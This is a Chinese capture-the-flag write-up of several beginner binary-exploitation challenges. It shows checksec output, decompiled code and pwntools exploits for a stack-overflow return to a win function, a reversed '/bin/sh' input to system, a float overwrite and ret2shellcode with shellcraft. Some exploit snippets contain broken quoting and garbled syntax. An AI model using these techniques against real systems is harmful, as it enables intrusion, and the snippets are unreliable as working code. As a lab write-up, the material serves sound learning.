nc直接连接cat flag就行,没什么好说的,签到题目
1 2 3 4 5 6 7 checksec --file=1 [*] '/mnt/hgfs/windowshare/1' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
checksec检查文件保护,ida分析
1 2 3 4 5 int __fastcall main(int argc, const char **argv, const char **envp) { vuln(argc, argv, envp); return 0; }
发现vuln函数,跟进
1 2 3 4 5 6 ssize_t vuln() { char buf[16]; // [rsp+0h] [rbp-10h] BYREF return read(0, buf, 0x64uLL); }
发现read漏洞函数,同时buf距离rbp寄存器为0x10
左侧导航栏看见gift函数,跟进得到/bin/sh起始地址
exp如下
1 2 3 4 5 6 7 python>> from pwn import *p = process(./pwn1) gift = 0x4006b6 payload = b'a' *(0x10 +0x8 )+p64(gift) p.sendline(payload) p.interactive()
和第一道题一样,nc过去直接找flag,简单
checksec正常检查
1 2 3 4 5 6 7 [*] '/mnt/hgfs/windowshare/re' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled
开启了NX(栈不可执行)保护和PIE(地址空间布局随机化)保护
可谓是火力全开
ida查看文件
1 2 3 4 5 6 7 8 9 10 11 int __fastcall main(int argc, const char **argv, const char **envp) { setvbuf(stdin, 0LL, 2, 0LL); setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stderr, 0LL, 2, 0LL); puts("evcexe ot tnaw uoy tahw em lleT:"); gets(a); fun(a); system(a); return 0; }
发现fun函数,跟进
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 __int64 __fastcall fun(const char *a1) { __int64 result; // rax char v2; // [rsp+17h] [rbp-9h] int i; // [rsp+18h] [rbp-8h] int v4; // [rsp+1Ch] [rbp-4h] v4 = strlen(a1); for ( i = 0; ; ++i ) { result = (unsigned int)(v4 / 2); if ( i >= (int)result ) break; v2 = a1[i]; a1[i] = a1[v4 - i - 1]; a1[v4 - i - 1] = v2; } return result; }
观察if语句,发现它交换了我们输入的数值,也就是题目给的倒序输出
fun函数输出给main函数,然后执行,观察到有system只需要/bin/sh即可拿到shell
exp
1 2 3 4 5 6 python> from pwn import *p = process(./pwn1) payload = hs/nib p.sendline(payload) p.interactive()
简单且有趣
checksec检查一下
1 2 3 4 5 6 7 [*] '/mnt/hgfs/windowshare/[CISCN 2019华北]PWN1' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
开启了NX保护
1 2 3 4 5 6 7 int __fastcall main(int argc, const char **argv, const char **envp) { setvbuf(_bss_start, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 2, 0LL); func(); return 0; }
发现func函数,跟进
1 2 3 4 5 6 7 8 9 10 11 12 13 int func() { char v1[44]; // [rsp+0h] [rbp-30h] BYREF float v2; // [rsp+2Ch] [rbp-4h] v2 = 0.0; puts("Let's guess the number."); gets(v1); if ( v2 == 11.28125 ) return system("cat /flag"); else return puts("Its value should be 11.28125"); }
观察代码我们可以发现我们要通过覆盖变量的返回值来使得v2=11.28125
但是不能直接输入11.28125,要转换成16进制数
ida中查看汇编可以观察到0x4007F4这个地址里面有11.28125的16进制数
是0x41348000
exp
1 2 3 4 5 6 python>> from pwn import *p = process(./pwn1) payload = b'a' *(0x30 -0x4 )+p64(0x41348000 ) p.sendline(payload) p.interactive()
checksec检查一下
1 2 3 4 5 6 [*] '/mnt/hgfs/windowshare/shellcode' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
可以看到开启了NX保护
没有PIE不需要gdb动态调试
ida查看源文件
1 2 3 4 5 6 7 8 9 10 11 12 13 int __fastcall main(int argc, const char **argv, const char **envp) { char s[256]; // [rsp+0h] [rbp-100h] BYREF setbuf(stdin, 0LL); setbuf(stderr, 0LL); setbuf(stdout, 0LL); mprotect((void *)((unsigned __int64)&stdout & 0xFFFFFFFFFFFFF000LL), 0x1000uLL, 7); memset(s, 0, sizeof(s)); read(0, s, 0x110uLL); strcpy(buff, s); return 0; }
有NX保护看似不能ret2shellcode
观察到有mprotect函数(自行百度)
buf_addr = 0x4040A0//注意这里的地址是bss段的,re2shellcode就是要在bss段传入写好的shell
有read溢出点,没有后门函数
满足ret2shellcode条件
直接打!
exp//架构一定要加因为elf文件是64位,不加会EOF
1 2 3 4 5 6 7 8 9 python>> from pwn import *context.log_level=“DEBUG” context.arch=‘amd64’ p = process('./shellcode' ) sh = asm(shellcraft.sh()) payload_1=sh.ljust(0x108 ,b’a’)+p64(0x4040A0 ) p.sendline(payload_1) p.interactive()
拿到shell
